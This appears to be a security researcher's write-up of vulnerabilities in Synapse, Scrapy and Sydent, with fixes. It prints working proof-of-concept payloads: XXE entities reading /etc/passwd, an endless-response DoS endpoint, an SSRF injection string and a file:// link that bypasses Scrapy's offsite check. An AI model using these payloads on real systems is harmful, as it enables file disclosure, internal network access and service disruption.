Claudio Salazar
🧑‍💻 Application Security Engineer @ ChartMogul
🐍 9 years developing in Python
Expertise in:
🕸 web scraping
🤺 secure software development
🕵🏼‍♂️ vulnerability research
# server_name is under my control
uri = b"https://%s/.well-known/matrix/server" % (server_name, )
uri_str = uri.decode("ascii")
logger.info("Fetching %s", uri_str)
try:
    response = yield self._well_known_agent.request(b"GET", uri)
    body = yield readBody(response)
    if response.code != 200:
        raise Exception("Non-200 response %s" % (response.code, ))
    parsed_body = json.loads(body.decode('utf-8'))
    logger.info("Response from .well-known: %s", parsed_body)
    ...
GET /.well-known/matrix/server HTTP/1.1
Host: domain.tld
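The problem: server_name is attacker-controlled, and readBody buffers the entire response with no size cap, so a hostile homeserver can answer this .well-known lookup with an arbitrarily large body. A minimal sketch of such a malicious endpoint (hypothetical; Flask is used here purely for illustration):

# Hypothetical malicious .well-known endpoint (illustrative sketch).
# It streams data forever, so a client that buffers the whole body
# in memory, as readBody does above, grows without bound.
from flask import Flask, Response

app = Flask(__name__)

@app.route("/.well-known/matrix/server")
def well_known():
    def endless():
        while True:
            yield b"A" * 65536  # never stop sending
    return Response(endless(), content_type="application/json")

Synapse's fix, below, swaps readBody for a size-capped read.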
uri = b"https://%s/.well-known/matrix/server" % (server_name,)
uri_str = uri.decode("ascii")
logger.info("Fetching %s", uri_str)
try:
    response = await self._well_known_agent.request(b"GET", uri)
    body = await read_body_with_max_size(response, WELL_KNOWN_MAX_SIZE)
    if response.code != 200:
        raise Exception("Non-200 response %s" % (response.code,))
    parsed_body = json_decoder.decode(body.decode("utf-8"))
    logger.info("Response from .well-known: %s", parsed_body)
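read_body_with_max_size aborts once the body exceeds WELL_KNOWN_MAX_SIZE. The same defensive idea, sketched with a plain blocking client (assuming the requests library; this is not Synapse's helper):

# Stream the response and enforce a byte budget while reading.
import requests

MAX_SIZE = 50 * 1024  # stand-in for the role WELL_KNOWN_MAX_SIZE plays

def fetch_limited(url: str) -> bytes:
    body = b""
    with requests.get(url, stream=True, timeout=10) as resp:
        for chunk in resp.iter_content(8192):
            body += chunk
            if len(body) > MAX_SIZE:
                raise ValueError("response exceeded %d bytes" % MAX_SIZE)
    return body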
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY example "hello"> ]>
<demo>
    <demoId>&example;</demoId>
</demo>

<demo>
    <demoId>hello</demoId>
</demo>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/issue.net"> ]>
<demo>
    <demoId>&example;</demoId>
</demo>

<demo>
    <demoId>Ubuntu 20.04.3 LTS
    </demoId>
</demo>
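The expansion above is easy to reproduce from Python with lxml, the parser Scrapy uses (a sketch; the exact output depends on your machine):

import lxml.etree

xml = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/issue.net"> ]>
<demo><demoId>&example;</demoId></demo>"""

# lxml's defaults include resolve_entities=True, so the SYSTEM entity
# is expanded and the file contents land in the parsed tree.
root = lxml.etree.fromstring(xml)
print(root.findtext("demoId"))  # e.g. "Ubuntu 20.04.3 LTS"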
from scrapy.spiders import SitemapSpider

class MySpider(SitemapSpider):
    sitemap_urls = ['http://www.example.com/sitemap.xml']

    def parse(self, response):
        ...
class Sitemap(object):
    def __init__(self, xmltext):
        xmlp = lxml.etree.XMLParser(recover=True, remove_comments=True)
        self._root = lxml.etree.fromstring(xmltext, parser=xmlp)
    ...
# Documentation: lxml.etree.XMLParser
XMLParser(
    ...,
    resolve_entities=True,
    ...
)
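Note the default: resolve_entities=True. The Sitemap parser above never asks for entity expansion; it simply inherits lxml's default.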
<?xml version="1.0" encoding="UTF-8"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
    <sitemap>
        <loc>http://domain.tld/sitemap1.xml.gz</loc>
        <lastmod>2004-10-01T18:23:17+00:00</lastmod>
    </sitemap>
</sitemapindex>
spider -> http://domain.tld/sitemap1.xml.gz
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [
    <!ELEMENT foo ANY >
    <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
    <sitemap>
        <loc>http://domain.tld/&xxe;.xml</loc>
    </sitemap>
</sitemapindex>
spider -> http://domain.tld/root:x:0:0:root:/root:/bin/bash[...].xml
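The parser expands &xxe; into the contents of /etc/passwd before the spider builds its follow-up request, so the local file is exfiltrated inside the URL of the next fetch, where the attacker can read it from their server's access logs.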
class Sitemap(object):
    def __init__(self, xmltext):
        xmlp = lxml.etree.XMLParser(
            recover=True,
            remove_comments=True,
            resolve_entities=False
        )
        self._root = lxml.etree.fromstring(xmltext, parser=xmlp)
    ...
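A quick check of the hardened parser, using the malicious sitemap from above (a sketch): with resolve_entities=False the &xxe; reference survives unexpanded and no file contents enter the tree.

import lxml.etree

sitemap = b"""<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [
    <!ELEMENT foo ANY >
    <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
    <sitemap><loc>http://domain.tld/&xxe;.xml</loc></sitemap>
</sitemapindex>"""

xmlp = lxml.etree.XMLParser(recover=True, remove_comments=True, resolve_entities=False)
root = lxml.etree.fromstring(sitemap, parser=xmlp)
print(lxml.etree.tostring(root).decode())  # &xxe; is still a bare reference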
[Image from PortSwigger Web Security Academy]
def render_POST(self, request):
    send_cors(request)
    args = get_args(request, ('matrix_server_name', 'access_token'))
    result = yield self.client.get_json(
        "matrix://%s/_matrix/federation/v1/openid/userinfo?access_token=%s" %
        (args['matrix_server_name'], urllib.parse.quote(args['access_token']),
         ),
    )
matrix_server_name=domain.tld/path_under_control?args_too=values_too#
def render_POST(self, request):
    send_cors(request)
    args = get_args(request, ('matrix_server_name', 'access_token'))
    result = yield self.client.get_json(
        "matrix://domain.tld/path_under_control?args_too=values_too#..."
    )
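Because matrix_server_name is interpolated without validation, the payload rewrites every URL component after the host; the trailing '#' even pushes the legitimate path and access_token into the fragment, which is never sent. A quick check with the standard library:

from urllib.parse import urlsplit

matrix_server_name = "domain.tld/path_under_control?args_too=values_too#"
url = "matrix://%s/_matrix/federation/v1/openid/userinfo?access_token=%s" % (
    matrix_server_name,
    "secret-token",
)
print(urlsplit(url))
# SplitResult(scheme='matrix', netloc='domain.tld',
#             path='/path_under_control', query='args_too=values_too',
#             fragment='/_matrix/federation/v1/openid/userinfo?access_token=secret-token')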
args = get_args(request, ("matrix_server_name", "access_token"))
matrix_server = args["matrix_server_name"].lower()
if not is_valid_matrix_server_name(matrix_server):
    request.setResponseCode(400)
    return {
        "errcode": "M_INVALID_PARAM",
        "error": "matrix_server_name must be a valid Matrix server name ...",
    }
result = await self.client.get_json(
    "matrix://%s/_matrix/federation/v1/openid/userinfo?access_token=%s"
    % (
        matrix_server,
        urllib.parse.quote(args["access_token"]),
    ),
    1024 * 5,  # max_size: cap the response body at 5 KiB
)
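is_valid_matrix_server_name rejects anything that is not a bare hostname (with optional port), which kills the injection. A rough sketch of that kind of check (illustrative only, not Sydent's exact implementation; real Matrix server names also allow IPv4/IPv6 literals):

import re

# Simplified hostname grammar; the input is already lowercased above.
_HOSTNAME_RE = re.compile(r"^[a-z0-9]([a-z0-9\-.]*[a-z0-9])?$")

def is_valid_matrix_server_name(value: str) -> bool:
    host, _, port = value.partition(":")
    if port and not port.isdigit():
        return False
    return bool(_HOSTNAME_RE.match(host))

The SSRF payload above contains '/' , '?' and '#', so it fails the check; a plain "domain.tld" passes.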
class FederationHttpClient(HTTPClient):
    def __init__(self, sydent: "Sydent") -> None:
        self.sydent = sydent
        self.agent = MatrixFederationAgent(
            BlacklistingReactorWrapper(
                reactor=self.sydent.reactor,
                ip_whitelist=sydent.config.general.ip_whitelist,
                ip_blacklist=sydent.config.general.ip_blacklist,
            ),
            ClientTLSOptionsFactory(sydent.config.http.verify_federation_certs)
            if sydent.use_tls_for_federation
            else None,
        )
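Validating the server name is not enough against SSRF: a legitimate-looking hostname can still resolve to an internal address. The BlacklistingReactorWrapper filters at connection time, after DNS resolution. The core idea, sketched (assumed example ranges; a real deployment takes them from config, as sydent does with ip_whitelist / ip_blacklist):

from ipaddress import ip_address, ip_network

BLACKLIST = [
    ip_network("127.0.0.0/8"),
    ip_network("10.0.0.0/8"),
    ip_network("172.16.0.0/12"),
    ip_network("192.168.0.0/16"),
    ip_network("169.254.0.0/16"),
]

def connection_allowed(resolved_ip: str) -> bool:
    # Check the *resolved* address, so DNS tricks can't point a
    # public name at an internal host after validation.
    return not any(ip_address(resolved_ip) in net for net in BLACKLIST)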
🤝 URI handlers add support for different protocols (one download handler per URI scheme)
import scrapy
from scrapy.http import Request

class ExampleSpider(scrapy.Spider):
    name = "example_spider"
    allowed_domains = ["dangerous.tld"]
    start_urls = ["http://dangerous.tld/"]

    def parse(self, response):
        next_url = response.xpath("//a/@href").extract_first()
        yield Request(next_url, self.parse_next)
<!doctype html>
<body>
    <a href="/next">click!</a>
</body>
<!doctype html>
<body>
    <a href="file:///etc/passwd">click!</a>
</body>
In [1]: from urllib.parse import urlparse
In [2]: urlparse("file:///etc/passwd").hostname is None
Out[2]: True
In [3]: urlparse("file://dangerous.tld/etc/passwd").hostname
Out[3]: 'dangerous.tld'
<!doctype html>
<body>
    <a href="file://dangerous.tld/etc/passwd">click!</a>
</body>
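The offsite check only compares hostnames, so file://dangerous.tld/etc/passwd is considered in scope even though the downloader will read a local file. A condensed sketch of the flawed logic (illustrative, not Scrapy's exact OffsiteMiddleware code):

from urllib.parse import urlparse

allowed_domains = ["dangerous.tld"]

def url_is_in_scope(url: str) -> bool:
    # Only the hostname is inspected; the scheme is ignored.
    return urlparse(url).hostname in allowed_domains

print(url_is_in_scope("file:///etc/passwd"))               # False: hostname is None
print(url_is_in_scope("file://dangerous.tld/etc/passwd"))  # True: scheme bypass!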
# settings.py
...
DOWNLOAD_HANDLERS = {
    'file': None,
    'data': 'scrapy.core.downloader.handlers.datauri.DataURIDownloadHandler',
    'http': 'scrapy.core.downloader.handlers.http.HTTPDownloadHandler',
    'https': 'scrapy.core.downloader.handlers.http.HTTPDownloadHandler',
    's3': 'scrapy.core.downloader.handlers.s3.S3DownloadHandler',
    'ftp': 'scrapy.core.downloader.handlers.ftp.FTPDownloadHandler',
}
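Mapping 'file' to None removes the download handler for that scheme entirely, so a crafted file:// link now fails the request instead of silently reading a local file.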
Thanks to: